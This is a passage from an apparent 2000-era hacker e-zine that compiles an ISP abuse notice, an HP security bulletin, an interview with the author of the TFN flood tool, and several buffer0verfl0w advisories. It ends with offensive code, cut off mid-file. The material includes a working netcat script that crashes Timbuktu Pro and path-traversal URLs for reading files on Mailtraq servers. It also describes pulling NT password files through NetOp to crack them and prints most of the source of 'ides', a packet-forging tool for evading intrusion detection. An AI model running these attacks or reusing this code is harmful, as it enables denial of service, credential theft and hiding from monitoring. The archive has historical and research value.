[22:03] <SugarKing> ok
[22:03] <p4ntera> heh
[22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
Session Close: Thu May 04 22:04:39 2000
@HWA
xx.x How to get banned from your ISP for *legal* activity in Canada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 3 May 2000 12:41:14 -0400
From: abuse@rogers.home.net
To: m*@home.com
Subject: Rogers@Home Network Security Dept. notice - Unauthorized Access Attempt
Dear Mr. XXXXXXXXXX XXXXXX:
It has been brought to our attention that an attempt to gain access/issue
commands to a computer system without the consent of the owner was traced to
your provisioned IP address. This may be a deliberate attempt to access
these computers, or your machine may have been compromised, in either event
you must make sure your computer is not used for any prohibited activity.
Please look into this and feel free to email us should you have any
questions. I have included the logs and or/complaint below.
As a result of our investigation, we have also found several servers
operating on our network from your connection. As ALL servers are a
violation of our End User Agreement, please remove all servers immediately.
To avoid any interruption of service, please email us with confirmation once
you have permanently removed all servers.
Sincerely,
Rogers@Home Network Security Dept.
http://rogers.home.com/CustomerSupport/Surf-Safe.html
Apr 27 02:29:27 crow named[64]: unapproved query from [24.XXX.XXX.XXX].1041
for "version.bind"
Apr 26 23:36:43 fionn rpcbind: refused connect from 24.XXX.XXX.XXX to dump()
HTTP/1.1 401 Authorization Required
Date: Tue, 08 Jan 1980 17:13:46 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0RC1
WWW-Authenticate: Basic realm="Intranet"
Connection: close
Content-Type: text/html; charset=iso-8859-1
@HWA
18.0 [SEC] Security Bulletins Digest May 02nd 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To:BugTraq
Subject:Security Bulletins Digest (fwd)
Date:Tue May 02 2000 18:16:22
Author:Justin Tripp
Message-ID:<Pine.HPX.4.21.0005030816110.2128-100000@zap.ee.byu.edu>
---------- Forwarded message ----------
Date: Wed, 3 May 2000 04:48:08 -0700 (PDT)
From: IT Resource Center <support_feedback@us-support.external.hp.com>
To: security_info@us-support.external.hp.com
Subject: Security Bulletins Digest
HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------
If you subscribed through the IT Resource Center and would
like to be REMOVED from this mailing list, access the
IT Resource Center on the World Wide Web at:
http://us.itresourcecenter.hp.com/
Login using your IT Resource Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================
Digest Name: Daily Security Bulletins Digest
Created: Wed May 3 3:00:03 PDT 2000
Table of Contents:
Document ID Title
--------------- -----------
HPSBUX9910-104 Sec. Vulnerability regarding automountd (rev. 01)
The documents are listed below.
-------------------------------------------------------------------------------
Document ID: HPSBUX9910-104
Date Loaded: 20000502
Title: Sec. Vulnerability regarding automountd (rev. 01)
-------------------------------------------------------------------------
**REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00104, 21 Oct 99
Last Revised: 2 May 2000
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: automountd can run user programs as root.
PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.20 and 11.00.
DAMAGE: Allows users to gain root privileges
SOLUTION: Apply the patches noted below.
AVAILABILITY: Patches are now available.
CHANGE SUMMARY: This revision contains patch information.
-------------------------------------------------------------------------
I.
A. Background
This problem was originally reported in CERT Advisory CA-99-05,
regarding the vulnerability in automountd which allows an
intruder to execute arbitrary commands with the privileges of
the automountd process.
We had previously reported that Hewlett-Packard platforms were
not vulnerable; we now have new information showing that we
are indeed vulnerable.
**REVISED 01**
B.| Fixing the problem
|
| For HP-UX release 11.00 apply PHNE_20371,
| for HP-UX release 10.20 apply PHNE_20628.
|
| NOTE: There are various patch dependencies associated with
| this patch, and rebooting is required.
C. To subscribe to automatically receive future NEW HP Security
Bulletins from the HP IT Resource Center via electronic mail,
do the following:
Use your browser to get to the HP IT Resource Center page
at: http://itrc.hp.com
Under the heading "Maintenance and Support" click on the link
"More..." and at the very bottom of that next page, click on
"Support Information Digests" underneath the heading NOTIFICATIONS.
Now login on the IT Resource Center Welcome page, using your user
ID and password (or register for one). You will need to login
in order to gain access to many areas of the ITRC. Remember to
save the User ID assigned to you, and your password.
Once you are on the Support Information Digests Main page,
follow the instructions there.
To -subscribe- to future HP Security Bulletins or other
Technical Digests, click the check box (in the left column)
for the appropriate digest and then click the "Update
Subscriptions" button at the bottom of the page.
To -review- bulletins already released from our archive, simply
click on the link near the top of the list entitled
"HP Security Bulletins Archive."
or
To -gain access- to the Security Patch Matrix, select
the link for "The Security Bulletins Archive". Once in
the archive the third link is to our current Security
Patch Matrix. Updated daily, this matrix categorizes security
patches by platform/OS release, and by bulletin topic.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com
~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9910-104--------------------------------------
@HWA
19.0 [b0f] Latest releases from Buffer Overflow Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: http://b0f.freebsd.lublin.pl/
Not *everything* that is new has been published here. Check the site to
see what you may be missing, meanwhile a good cross section of b0f's new
releases is featured here in following sections, with a couple of advisories
first then some new code. - Ed
<Cont'd>
@HWA
20.0 [HWA] Informal chat/interview with Mixter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mixter <mixter@newyorkoffice.com>
http://mixter.warrior2k.com/
Cruciphux <Cruciphux@dok.org>
http://welcome.to/HWA.hax0r.news/
Mixter is the author of TFN (Tribe Flood Network) software which was
recently brought into the limelight by Mafiaboy who used a variant called
mstream to attack some big name web sites and effectively shut them down
for several hours.
->
-> Technical Overview:
->
-> See Packetstorm http://packetstorm.securify.com
-> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
->
-> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
-> TFN is a powerful distributed attack tool and backdoor currently
-> being developed and tested on a large number of compromised
-> Unix systems on the Internet.
->
Sunday afternoon May 21st 2000.
[ For the most part un-edited so you can decide what is ]
[ interesting and what isn't, general chatter has been ]
[ removed and hostnames blanked out. ]
***** ADDENDUM/CORRECTION ***************************************************
[ NOTE: I was incorrectly under the assumption at the time of this interview
that Mafiaboy used Mixter's code to do his DDoS damage, this turned out to
be false, in fact mstream (discussed elsewhere with source code) was used and
NOT TFN. My apologies for the inaccuracies. - Cruciphux ]
******************************************************************************
Session Start: Sun May 21 13:13:43 2000
Session Ident: Mixter (mixter@*.net)
[13:19] <Cruciphux> what inspired you to write the TFN software?
[13:20] <Cruciphux> what where your goals, thoughts, intended uses
[13:20] <Cruciphux> :
[13:20] <Mixter> hmm
[13:20] <Mixter> well, I coded it for the same purpose I code everything,
because I simply like coding, and now or then you'll create something
important
[13:21] <Mixter> if not, coding something is always a new excercise for
yourself...
[13:21] <Cruciphux> you could code something but still not release it
publically, was it merely POC or did you expect it to be used?
[13:22] <Mixter> I've heard about these tools on irc like two years ago, at
least that people wanted to create them
[13:22] <Mixter> POC=? :)
[13:22] <Mixter> sorry I spend way too little time in usenet etc.
[13:22] <Cruciphux> Proof Of Concept
[13:22] <Cruciphux> np
[13:22] <Mixter> o
[13:23] <Mixter> no, the first version was just a nice powerful tool to
write up
[13:23] <Cruciphux> what is your view on the Mafiaboy debacle and how do you
feel about your software being used to attack major web sites?
[13:24] <Mixter> it was interesting to see this concept worked, and you
could contact hosts at a fast speed and with tunneling through raw packets
and all
[13:24] <Mixter> tfn2k, was however a pure POC.. any kiddie who tried to use
it will know how buggy it is :)
[13:25] <Cruciphux> can you explain the concept to us and how it works?
[13:25] <Mixter> I think, when the government and media forces need
something to puff out, they'll always find something
[13:25] <Mixter> if it wasnt for the dos attacks, it wouldve been something
else
[13:26] <Mixter> I believe all packet kiddies out there should get a life...
but they do more damage to irc servers and users than anything else, though
[13:26] <Cruciphux> true but it was you that made the tool available, they
may not otherwise have decided to attack these sites
[13:27] <Cruciphux> do you feel responsible at all?
[13:28] <Mixter> the plain concept of distributed attacks is to start
processes from a lot of hosts, simple as that. in distributed packet
flooding, you launch all processes against a single target. theoretically,
before all the tools came out, when people just logged on to a lot of shells
and run their udp/syn flooders against 1 target, that was the same stuff.
what the new programs do, raw tunneling, or encrypted tcp control
connections are just feature improvements to the same
[13:28] <Mixter> that they have a big impact on feasibility and speed of
distributed attacks and other things like distributed scanning
[13:28] <Mixter> hm ok :)
[13:29] <Mixter> its important to realize that the "authorities" biggest
instrument is false guilt
[13:30] <Mixter> people can't withdraw from it, and if they do, they're
still being persecuted.. so I believe that people like mafiaboy arent
innocent since they knew what they were doing, but simply sitting in front
of your home computer and typing in commands can hardly make you a
"criminal"
[13:31] <Cruciphux> would you extend that view to "hacking" also?
[13:31] <Cruciphux> whats your view on people who deface websites?
[13:32] <Mixter> if you talk about hacking as in breaking into servers, I
have no ethical problems with it as long as it is for the cause of improving
the security, e.g. patching and/or notifying the people
[13:33] <Cruciphux> so you are ok with non destructive intrusion so long as
you patch the hole you came in through?
[13:33] <Mixter> website defacements in general are destructive, because
they can harm companies by destroying their images.. so it isnt something
people should do.. exceptions are of course sites that stand for violation
human and individual rights
[13:33] <Cruciphux> what if the system is borrowed to say, host a bot on irc
or launch further intrusion attempts?
[13:34] <Cruciphux> yes I personally believe that socio-politcal defacements
with a valid message are justifiable
[13:34] <Mixter> well, I DONT recommend intrusion at all in these big
brotherish times, it's far more easy to do productive, legal work, by
working for a company or founding your own one, but lets say I have no
problem with it, if no damage is created
[13:35] <Cruciphux> what other software are you working on presently?
[13:35] <Mixter> if they hack systems to host a bot, that's a pretty
clueless and dangerous way... if they HAVE to intrude or if they dont have
the small money, the only acceptable way is to contact the administration,
notify them of the problem and ask for resources in exchange for securing
their site
[13:36] <Mixter> yeah.. it's pretty lame though, when you see some
anti-human-rights site defaced, and you have in black on gray one line of
text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
[13:36] <Mixter> ;/
[13:37] <Cruciphux> considering the little cost involved in offering a
hacker system resources in exchange for securing a server it seems strange
it doesn't happen more often
[13:37] <Mixter> well, security software, audi
ting software and more.. the
problem is I can't disclose that without permission from my employees, and I
wouldn't break my agreement
[13:37] <Mixter> err employers
[13:38] <Cruciphux> you currently are employed in the security field, were
you ever a grey-hat?
[13:38] <Cruciphux> i suppose thats a round about way of asking if you have
hacked yourself in the past
[13:38] <Mixter> yes it does.. but the whole thing is based on trust, and if
it would become practice that hackers outline vulnerabilities and then get
local access (from where they have LOTS of insider attacking possibilities),
most people would have a problem trusting them
[13:39] <Mixter> heh.. well yeah, I broke into hosts without permission in
the past
[13:39] <Cruciphux> trust is earned however and the notification of
intrusion would be a demonstration of intent
[13:39] <Mixter> at the beginning of my carreer, I started out with
developing eggdrop/tcl (not for takeover, just for defense and fun for the
most part)
[13:39] <Cruciphux> how old are you?
[13:40] <Mixter> that was 2 1/2 years ago.. I hadn't a clue about the legal
issues back then, and wasn't even certain if what I was doing is illegal
[13:42] <Mixter> ah, the notification of intrusion could also be used as a
social engineering (<- stupid term :P) method, to get the trust, and then
attack them from the inside with their consent :>
[13:42] <Cruciphux> how did you get into computers? what was your intial
exposure? first machine?
[13:43] <Mixter> no, I don't care about that, after about 50 news agencies
published name, address, birthdate, and photos of me back in february :P
[13:43] <Cruciphux> k
[13:45] <Cruciphux> how did you get into computers? what was your intial
exposure? first machine?
[13:46] <Mixter> my initial exposure was a c64 I used when I was about 6-8
yrs old
[13:46] <Mixter> i programmed a lot in basic, some machine language later :)
[13:47] <Cruciphux> Are you self taught or do you have any official
schooling in programming etc?
[13:47] <Mixter> if people wouldnt all start with big PC OS's like windows,
they'd probably figure out programming and the ins and outs of computing
much better and faster...
[13:47] <Cruciphux> yeah I started on a vic-20
[13:47] <Cruciphux> wrote a bbs on it
[13:47] <Cruciphux> it had 4k ram
[13:47] <Mixter> oh well, the nice feds took away my computer back in 98
[13:48] <Cruciphux> for what?
[13:48] <Mixter> i hadnt had a pc for 3 months, that was when I read awful
lots of programming, networking etc books and really got into the technical
aspects
[13:48] <Mixter> for installing some bots on a couple of hosts :]
[13:48] <Cruciphux> *g*
[13:49] <Cruciphux> thats about it really, thanks for yer time, any closing
comments?
[13:49] <Mixter> hey, nobody's perfect. I really *was* clueless about the
tracing stealthing etc aspects of hacking, leave alone the legal stuff back
then.. just exploring and doing anything I could :)
[13:49] <Cruciphux> :-)
[13:49] <Mixter> nope, if you dont have any closing questions ;)
[13:49] <Cruciphux> when I sold my first c64 system, the guy that bought had
nagged and nagged me
[13:50] <Mixter> hehe
[13:50] <Cruciphux> for some phreaking software i had, I finally gave in and
let him have it warning him not to
[13:50] <Cruciphux> actually use it unless he learned how it worked etc
[13:50] <Cruciphux> he called me a week later
[13:50] <Mixter> phreaking is something nice.. I really wish I could've done
it in the time and/or country when it was feasible and not too dangerous
[13:50] <Cruciphux> he was busted and had the $750 system confiscated
[13:50] <Cruciphux> :)
[13:51] <Mixter> aw :)
[13:51] <Cruciphux> I was into it when I was younger
[13:51] <Cruciphux> it was fun
[13:51] <Mixter> i spent $3000 on my first PC
[13:51] <Cruciphux> yeh same here
[13:51] <Mixter> the one that got confiscated ;x
[13:52] <Cruciphux> I paid $900 for a used 9M hard drive for my c64 bbs and
$1000 for the USR 9600 external modem
[13:52] <Cruciphux> heh
[13:54] <Cruciphux> funny thinking about a 9 megabyte hard disk these days,
it was the size of a ups
[13:55] <Cruciphux> actually it might have been 7M
[13:55] <Cruciphux> anyways we're all done i'll ttyl - thanks
Session Close: Sun May 21 13:55:44 2000
END
@HWA
21.0 [b0f] b0f3-ncurses.txt FreeBSD 3.4 libncurses buffer overflow by venglin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2000-04-24
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor: FreeBSD Inc.
WWW: www.freebsd.org
Severity: setuid programs linked with libncurses
can be exploited to obtain root access.
Author: venglin (venglin@freebsd.lublin.pl)
Homepage: www.b0f.com
* The Problem
lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
* Vulnerable Versions
- 3.4-STABLE -- vulnerable
- 4.0-STABLE -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable
@HWA
22.0 [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by axess 2000-04-12
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 2
Advisory Name: NetOp, Bypass of NT Security to retrieve files
Date: 12/4/00
Application: NetOp Remote Control
Vendor: Danware
WWW: www.netop.dk
Severity: Any user can browse and even download
files from the remote computer
Author: axess ( axess@mail.com )
Homepage: www.b0f.com
* Overview
NetOp is a remote administrator control tool that allows you to capture
the screen and it will act as if you were infront of it.
Its a client / host based software.
* The Problem
By default there is no account set up for verify that you are authorised to use
the host software running on the server and anyone that has an client for it can
access the screen.
Default port 6502 is used.
I have done a lot of testing of this and found out that most of the people running
it dont use the accounts that can be set up to verify with an account and password
that u are allowed to use the host.
They rely on the NT security with locking the screen that should be enough.
So if we log on we get a normal screen that says login with administrator account.
Not easy to bypass, but then there is a function that you can use called file transfer.
I use that method and a screen that looks like explorer will appear and you can download
sam._ or what ever file you want and start cracking it while just bypassing all
the NT security.
* Vulnerable Versions
Version 6 is the only one tested but i beleive all versions
prior to that is vulnerable.
* Fix
6.5 has just been released and uses the NT security that will fix this problem.
copyright © 1999-2000
axess , buffer0verfl0w security
www.b0f.com
@HWA
23.0 [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by slash 2000-03-22
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 1
Advisory Name: Mailtraq remote file retriving
Date: 3/22/00
Application: Mailtraq 1.1.4 for Win 95/98
Vendor: Fastraq Limited
WWW: www.mailtraq.com
Severity: Any user can browse and even download
files from the remote computer
Author: slash (tcsh@b0f.i-p.com)
Homepage: www.b0f.com
* Overview
Mailtraq is a message server aimed at individuals, small and medium sized
companies and home offices (SOHOS). Mailtraqs primary goal is to provide online
services to local users by storing incoming and outgoing news and mail messages
offline, then connecting to the Internet at controlled intervals to deliver
outgoing messages and collect and store incoming messages. Mailtraq provides fully
featured Mail, News and Intranet services, full disk logging of all activity,
comprehensive firewall facilities plus many other services such as a Finger client,
Mail-to-News and News-To-Mail gateways, Web Administration, etc. Mailtraq requires
either the Windows NT (Server or Workstation), Windows 95 or Windows 98 operating
systems to be running on the machine on which it is loaded.
* The Problem
By default Mailtraq installs it's Webmail Administration menu which is
accessible via http://some.domain.com/$/admin . The problem accoured when We tried
to retrive http://some.domain.com/ We configured Mailtraq's WWW server root directory
to be C:\Program Files\Mailtraq\websys\webmail Since that \websys\webmail directory
doesn't contain index.html the server returned the complete file listing of the
directory C:\Program Files\Mailtraq\websys\webmail. So we tried to exploit this a
little bit, and discovered that anyone can browse and download files on the remote
computer running Mailtraq Mail Server. Here is how to exploit it:
http://127.0.0.1/./../../../
And You should get the complete listing of of files in c:\Program Files\ . When We
tried to exploit this, we could only browse files from c:\Program Files\ . When we
would add some more /../../../ to the exsisting URL we would get a "404 Page not
found". We played around with this a little bit and found a way to exploit this too.
To get to windows we should add some more /../../../ but a correct directory name
was required. So we did it this way:
http://127.0.0.1/../../../../../../../../../../././../../././..././.../.../windows/
Here it is!!! The complete listing of C:\windows . Now this is as far as we go.
On Windows NT machines running Mailtraq You could just get sam._ , run l0phtcrack
against it and compromise the machine.
There is also a bug that allows the remote attacker to find out in what directory
is Mailtraq installed in. By inputing a large string after http://some.domain.com/
the server will return the path to Mailtraq's installation directory. Exsample:
http://127.0.0.1/../aaaaaaaaa[a lot of a's]aaaaaaa
The output You should get will look like this:
File "C:\Program Files\Mailtraq\websys\webmail\aaaaaa[a lot of a's]aaaaaa" could
not be found
* Vulnerable Versions
We tested version 1.1.4. on Windows 98. All versions prior to 1.1.4 are
vulnerable. We aren't sure if the Windows NT version is affected.
* Fix
At this time we aren't familiar with any fix for this bug.
copyright © 1999-2000
slash, buffer0verfl0w security
www.b0f.com
@HWA
24.0 [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding to connections
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/sh
# *Needs netcat in order to work......*
# Immune systems:
# Timbuktu Pro 2000
#
# Vulnerable systems:
# Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto)
#
# Exploit:
# - Connect and disconnect to port TCP/407 and port TCP/1417 will start
# listening.
# - Connect on port TCP/1417 (using a simple telnet client).
# - Disconnect from TCP/1417 (with no data exchange).
#
# Workaround:
# - Kill Timbuktu process (using pslist/pskill for example).
# - Stop Timbuktu services.
# - Start them again.
echo "Exploit:"
echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will start listening."
echo " - Connect on port TCP/1417 (using a simple telnet client)."
echo " - Disconnect from TCP/1417 (with no data exchange)."
echo "Coded: eth0 from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo "Checking if host is actually listening on port 407"
telnet $1 407 1>.timb.tmp 2>.timb.tmp &
echo "Sleeping 5 seconds..."
sleep 5
killall -9 telnet 1>/dev/null 2>/dev/null
cat .timb.tmp | grep "Connected" >/dev/null 2>&1
if [ $? -eq 0 ]; then
timb="1"
echo "[$1] is listening on port 407..."
echo "Exploiting:..."
nc $1 1417 1>/dev/null 2>/dev/null
sleep 3
killall -9 nc 1>/dev/null 2>/dev/null
echo "Done!!"
fi
if [ "$timb" != "1" ]; then
echo "[$1] Is not listening on port 407 = doesn't exist..."
fi
@HWA
25.0 [b0f] ides.c:'Intrusion Detection Evasion System'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* ides version 0.3 - 'intrusion detection evasion system'
* (c) Jan 2000 by Mixter
*
* IDES will go into background and watch incoming traffic, inserting forged
* TCP ack, rst and fin packets for every transmitted data packet. The sessions
* will not be affected, since the sequence numbers change, but all sniffing
* and monitoring software that evaluates raw packets is possibly tricked into
* evaluating the forged data or seeing reset connections, making logging
* unreliable or impossible. As a second feature, IDES will create a custom
* amount of fake SYNs on each valid tcp connection request, transparently
* simulating coordinated/decoy scans from random source addresses.
* IDES can be used on a remote host or locally to fool sniffers, IDS and
* other network monitors and to generate random decoy probes while scanning.
* Acknowledgements: MUCH of this idea is from stran9ers (private) code, which
* is better to configure, and from horizons article in Phrack 54.
*
* Changes:
* v 0.3 - code sanitized, prevent generation of ACK storms/feedback loops
* v 0.2 - now uses a unique XOR (ph33r) challenge value for each process
*/
#define DECOYS 10 /* number of forged SYNs to send on each
tcp connection initiation */
#undef DEBUG /* stay in foreground + dump packet info */
#undef NO_INADDR /* solaris */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#ifndef IP_HDRINCL
#define IP_HDRINCL 3
#endif
#ifndef PF_INET
#define PF_INET 2
#endif
#ifndef AF_INET
#define AF_INET PF_INET
#endif
typedef unsigned char u8;
typedef unsigned short int u16;
typedef unsigned int u32;
#ifndef NO_INADDR
#ifndef in_addr
struct in_addr
{
unsigned long int s_addr;
};
#endif
#endif
#ifndef htons
#if __BYTE_ORDER == __BIG_ENDIAN
#define ntohl(x) (x)
#define ntohs(x) (x)
#define htonl(x) (x)
#define htons(x) (x)
#else
unsigned long int htonl (unsigned long int hostlong);
unsigned short int htons (unsigned short int hostshort);
unsigned long int ntohl (unsigned long int netlong);
unsigned short int ntohs (unsigned short int netshort);
#endif
#endif
#define IP 0
#define TCP 6
#define RAW 255
struct sa
{
u16 fam, dp;
u32 add;
u8 zero[8];
}
sadd;
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
u8 ihl:4, ver:4;
#else
u8 ver:4, ihl:4;
#endif
u8 tos;
u16 tl, id, off;
u8 ttl, pro;
u16 sum;
u32 src, dst;
}
*ih;
struct tcp
{
u16 src, dst;
u32 seq, ackseq;
#if __BYTE_ORDER == __LITTLE_ENDIAN
u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, res2:2;
#else
u16 doff:4, res1:4, res2:2, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
u16 win, sum, urp;
}
*th;
unsigned short ip_sum (unsigned short *, int);
unsigned short
ip_sum (addr, len)
unsigned short *addr;
int len;
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(unsigned char *) (&answer) = *(unsigned char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
char rseed[65535];
int rcounter = 0;
void
random_init (void)
{
int rfd = open ("/dev/urandom", O_RDONLY);
if (rfd < 0)
rfd = open ("/dev/random", O_RDONLY);
rcounter = read (rfd, rseed, 65535);
close (rfd);
}
inline long
getrandom (int min, int max)
{
if (rcounter < 2)
random_init ();
srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
rcounter -= 2;
return ((random () % (int) (((max) + 1) - (min))) + (min));
}
u32 magic;
char packet[1024], *dh;
#define GETLRANDOM (getrandom (0, 65535) * getrandom (0, 65535))
#define CLONED ((ntohl(th->seq) == (ntohl (ih->src)^magic)))
void
syndecoy (int s)
{
#ifdef DEBUG
printf ("*");
#endif
sadd.fam = AF_INET;
sadd.dp = th->dst;
sadd.add = ih->dst;
ih->ver = 4;
ih->ihl = 5;
ih->tos = 0x00;
ih->tl = sizeof (struct ip) + sizeof (struct tcp);
ih->id = getrandom (0, 65535);
ih->off = 0;
ih->ttl = getrandom (200, 255);
ih->pro = TCP;
ih->sum = 0;
ih->src = htonl (GETLRANDOM);
th->seq = htonl (ntohl (ih->src) ^ magic);
th->ackseq = 0;
th->res1 = 0;
th->doff = 0;
th->fin = 0;
th->syn = 1;
th->ack = 0;
th->rst = 0;
th->psh = 0;
th->ack = 0;
th->urg = 1;
th->res2 = 0;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
memset (dh, 0, 256);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
}
void
idscrew (int s)
{
int flg = ((th->ack) && (!th->psh)), rl = getrandom (0, 256);
#ifdef DEBUG
printf (".");
#endif
sadd.fam = AF_INET;
sadd.dp = th->dst;
sadd.add = ih->dst;
ih->ver = 4;
ih->ihl = 5;
ih->tos = 0x00;
ih->tl = sizeof (struct ip) + sizeof (struct tcp);
ih->id = getrandom (0, 65535);
ih->off = 0;
ih->ttl = getrandom (200, 255);
ih->pro = TCP;
ih->sum = 0;
th->seq = htonl (ntohl (ih->src) ^ magic);
th->ackseq = htonl (GETLRANDOM);
th->res1 = 0;
th->doff = 0;
th->fin = 0;
th->syn = 0;
th->ack = 1;
th->rst = 0;
th->psh = 1;
th->ack = 0;
th->urg = 0;
th->res2 = 0;
memset (dh, 0, 256);
th->ack = 0;
th->psh = 0;
th->rst = 1;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
if (flg) /* this is necessary to prevent ev1l ACK st0rmz#@!$ */
return;
th->rst = 0;
th->fin = 1;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
ih->tl += rl;
th->fin = 0;
th->ack = 1;
memcpy (dh, rseed + getrandom (0, 5000), rl);
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
th->psh = 1;
memcpy (dh, rseed + getrandom (0, 5000), rl);
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
ih->tl -= rl;
}
int
main (int argc, char **argv)
{
char *opt = "1";
int i = 0, s = socket (AF_INET, SOCK_RAW, TCP);
magic = GETLRANDOM; /* initialize our magic challenge */
ih = (struct ip *) packet;
th = (struct tcp *) (packet + sizeof (struct ip));
dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp));
#ifndef DEBUG
if ((i = fork ()))
{
printf ("%s launching into the background (pid: %d)\n", argv[0], i);
exit (0);
}
#endif
if (s < 0)
perror ("");
if (setsockopt (s, IP, IP_HDRINCL, opt, sizeof (opt)) < 0)
perror ("");
while (1)
{
if (read (s, packet, 1020) > 0)
if ((!CLONED) && (th->ack))
{
#ifdef DEBUG
printf ("Seq: %lu, ack: %lu, src: %lu (S%dA%dP%dF%dR%dU%d)\n",
ntohl (th->seq), ntohl (th->ackseq), ntohl (ih->src),
th->syn, th->ack, th->psh, th->fin, th->rst, th->urg);
fflush (stdout);
#endif
